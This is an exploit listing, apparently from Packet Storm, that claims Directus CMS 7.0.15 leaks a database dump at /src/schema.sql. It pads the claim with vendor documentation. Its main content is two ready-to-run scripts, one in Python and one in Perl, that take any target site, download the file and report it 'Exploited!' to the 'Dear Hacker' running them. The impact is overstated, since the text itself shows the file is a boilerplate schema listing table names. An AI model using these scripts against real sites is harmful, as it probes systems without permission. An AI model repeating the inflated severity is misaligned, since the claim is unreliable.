Directus Suite CMS 7.0.15 Database Disclosure

2019-04-02T00:00:00
ID PACKETSTORM:152344
Type packetstorm
Reporter KingSkrupellos
Modified 2019-04-02T00:00:00

Description

                                        
                                            `###########################################################################  
  
# Exploit Title : Directus Suite CMS 7.0.15 Database Disclosure Exploit  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 02/04/2019  
# Vendor Homepage : directus.io  
# Software Download Link : github.com/directus/directus/archive/master.zip  
# Software Information Link : docs.directus.io/guides/database.html#directus-schema  
github.com/directus/directus  
# Software Version : 7 - 7.0.9 - 7.0.15  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Vulnerability Type :   
CWE-200 [ Information Exposure ]  
CWE-538 [ File and Directory Information Exposure ]  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
# Acunetix Information Link about => MySQL database dump  
acunetix.com/vulnerabilities/web/mysql-database-dump/  
  
###########################################################################  
  
# Description about Software :  
***************************  
Directus 7 Suite — Future-Proof Headless CMS & API for Custom Databases.  
  
Directus is an open-source suite of software that provides an instant API wrapper for SQL databases   
  
and an intuitive Admin App for non-technical users to manage that content. It's like a safe, friendly, and   
  
super-powered "database client" (eg: PHP-my-Admin or Sequel Pro).  
  
###########################################################################  
  
# Impact :  
***********  
* The product stores sensitive information in files or directories that are accessible   
  
to actors outside of the intended control sphere.  
  
* An information exposure is the intentional or unintentional disclosure of information   
  
to an actor that is not explicitly authorized to have access to that information.  
  
* A database dump contains a record of the table structure and/or the data from a database   
  
and is usually in the form of a list of SQL statements. A database dump is most often used for   
  
backing up a database so that its contents can be restored in the event of data loss.   
  
This file contains a MySQL database dump. This information is highly sensitive   
  
and should not be found on a production system.  
  
* Remediation - Restrict access to this file or remove it from the system.  
  
Information :  
************  
Database-First =>   
  
Directus follows a database-first approach, storing all of your data unaltered   
in pure SQL databases with that can be completely customized.  
  
Access and Optimization =>  
  
Directus mirrors your actual database so it will automatically stay in sync with   
any changes made directly to the database! With the full power of SQL unlocked, you can:  
Architect your actual database with meaningful table and column names  
Infinitely optimize with indexing, datatypes, lengths, defaults, keys, encoding, etc  
Update your database schema at any point and Directus will instantly reflect changes  
Create, update, and delete content directly from the database  
  
Direct Access =>   
  
This database-first approach means that you have the option to completely bypass   
Directus if needed. Connecting your application directly to the database means Directus is completed.  
  
Creating a Database  
  
# MySQL  
Connect to MySQL:  
  
$ mysql -h <host> -u <user> -p  
  
The command above will ask you for the user password:  
  
$ mysql -h localhost -u root -p  
Enter password: ****  
  
After you successfully log into MySQL, run the CREATE DATABASE command:  
  
mysql> CREATE DATABASE directus;  
Query OK, 1 row affected (0.00 sec)  
# Directus Schema  
  
This document provides an explanation of all tables and fields within the Directus schema boilerplate.  
  
Name Description  
directus_activity Log of all actions (eg: item updates) performed through the API (or App)  
directus_activity_read Tracks if a user has seen an Activity/Message item  
directus_collection_presets User's collection preferences and bookmarks for Item Listing page  
directus_collections Information for database tables (collections) managed by Directus  
directus_fields Information for database columns (fields) and their interfaces  
directus_files Metadata for all files and embeds added to Directus  
directus_folders Nestable virtual directories used to organize Directus files  
directus_migrations Database schema changes for upgrades/downgrades created by Phinx  
directus_permissions Defines specific API access rules for a specific Role  
directus_relations Keys and junctions for field-level relationships between collections  
directus_revisions The delta and full data snapshot for all item Activity (eg: updates)  
directus_roles Listing of user roles that group together sets of permissions  
directus_settings Ad-hoc key-value-pairs for storing Global and Extension settings  
directus_user_roles Junction table allowing users to possess multiple roles  
directus_users Directory of all App and API Users  
  
###########################################################################  
  
File :  
*****  
/directus/src/schema.sql  
  
/src/schema.sql  
  
/schema.sql  
  
Information :  
************  
# Sequel Pro SQL dump  
# Version 4541  
# Host: localhost (MySQL 5.6.38)  
# Database: directus  
  
# Dump of table directus_activity  
  
# Dump of table directus_activity_seen  
  
# Dump of table directus_collection_presets  
  
# Dump of table directus_collections  
  
# Dump of table directus_fields  
  
# Dump of table directus_files  
  
# Dump of table directus_folders  
  
# Dump of table directus_migrations  
  
# Dump of table directus_permissions  
  
# Dump of table directus_relations  
  
# Dump of table directus_revisions  
  
# Dump of table directus_roles  
  
# Dump of table directus_settings  
  
# Dump of table directus_user_roles  
  
# Dump of table directus_users  
  
###########################################################################  
  
# Database Disclosure Information Exposure Exploit 1 :  
***********************************************  
#!/usr/bin/python  
import string  
import re  
from urllib2 import Request, urlopen  
disc = "/src/schema.sql"  
url = raw_input ("URL: ")  
req = Request(url+disc)  
rta = urlopen(req)  
print "Result"  
html = rta.read()  
rdo = str(re.findall("resources.*=*", html))  
print rdo  
exit  
  
###########################################################################  
  
# Database Disclosure Information Exposure Exploit 2 :  
***********************************************  
#!/usr/bin/perl -w  
# Author : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
  
use LWP::Simple;  
use LWP::UserAgent;  
  
system('cls');  
system('Directus Suite CMS 7.0.15 Database Disclosure Exploit');  
system('color a');  
  
  
if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;  
  
$File="src/schema.sql";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Wait Please Dear Hacker!!! \n\n";  
  
my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/src/schema.sql");  
  
if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/src/schema.sql\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}  
  
###########################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
###########################################################################  
`